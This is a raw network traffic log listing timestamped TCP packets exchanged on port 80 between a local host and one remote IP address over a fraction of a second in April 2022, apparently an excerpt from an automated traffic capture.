Apr 19, 2022 16:44:44.176219940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176237106 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176258087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.176434994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176450968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176471949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.176712036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176731110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176753998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.176939011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176955938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.176980019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.177149057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177165985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177196026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.177388906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177406073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177433014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.177570105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177586079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177609921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.177829027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177845955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.177872896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.178070068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178086996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178109884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.178231955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178272009 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.178369999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178386927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178632975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178649902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178673983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.178705931 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.178829908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178845882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.178884983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.179069996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179086924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179132938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.179270029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179286003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179550886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179567099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179590940 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.179624081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.179649115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179891109 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179908991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.179933071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.180111885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180129051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180151939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.180296898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180314064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180336952 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.180550098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180573940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180598974 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.180797100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180814028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180838108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.180932045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.180969000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.181109905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181127071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181310892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181327105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181353092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.181379080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.181545973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181610107 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181653976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.181790113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181812048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.181859970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.181914091 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.182147026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.182172060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.182219982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.182275057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.182317972 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.182369947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.182552099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.183664083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.183851004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.183913946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.183978081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184020042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184031010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184058905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184067011 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184111118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184153080 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184191942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184199095 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184231043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184231997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184277058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184317112 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184355974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184366941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184396982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184407949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184463978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184509039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184552908 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184552908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184597015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184600115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184643030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184745073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184784889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.184813976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184844971 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.184885025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185075998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185117960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185127020 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.185363054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185405016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185452938 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.185585976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185628891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185636044 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.185791969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185834885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185883999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.185950041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.185995102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.186098099 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186136961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186253071 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186304092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.186456919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186501026 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.186522007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186615944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186836958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186875105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186894894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.186916113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.186927080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.187114000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187177896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.187215090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187346935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187388897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187438965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.187500954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187561035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.187625885 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187915087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187958002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.187971115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.188050985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188091993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188137054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.188201904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188246012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.188390970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188431978 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188493967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188543081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.188693047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188740015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.188793898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.188925982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189026117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189071894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.189122915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189166069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.189306974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189348936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189388990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189441919 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.189667940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189711094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189713955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.189841032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189939976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.189989090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.190037966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190085888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.190248013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190289974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190372944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190423012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.190478086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190520048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.190629959 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190715075 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190798044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190848112 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.190906048 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.190952063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.191109896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191154957 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191268921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191318035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.191355944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191417933 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.191471100 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191668987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191711903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191764116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.191833019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.191886902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.191910028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192023993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192079067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.192212105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192239046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192289114 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.192353010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192543983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192570925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192622900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.192686081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.192739010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.192830086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193093061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193118095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193171024 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.193248034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193274975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193294048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.193382025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193593025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193619013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193645000 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.193676949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.193813086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193839073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.193883896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.193975925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194289923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194317102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194367886 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.194411993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194436073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194457054 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.194717884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194742918 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194767952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.194792032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.194823980 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.194839001 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195053101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195076942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195122957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.195293903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195319891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195338964 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.195496082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195523024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195569992 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.195641994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195852995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195878983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.195905924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.195923090 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.196027040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196166992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196191072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196217060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.196430922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196456909 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196477890 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.196588993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196651936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196697950 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.196861982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196887016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.196903944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.197093010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197118998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197160959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.197253942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197293043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.197386026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197534084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197560072 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197608948 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.197706938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.197752953 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.197770119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198004961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198029041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198072910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.198191881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198250055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.198292971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198390007 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198544979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198570013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198589087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.198617935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.198817968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198843956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.198964119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199006081 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.199028015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199068069 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.199163914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199381113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199414015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199457884 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.199553967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199599028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.199635983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199736118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199780941 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.199892044 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.199954987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200177908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200201988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200222969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.200248957 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.200265884 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200498104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200521946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200584888 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.200691938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200717926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.200741053 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.200948954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201056004 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201080084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.201107979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.201134920 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.201225042 CEST	80	49758	45.135.48.153	192.168.2.4
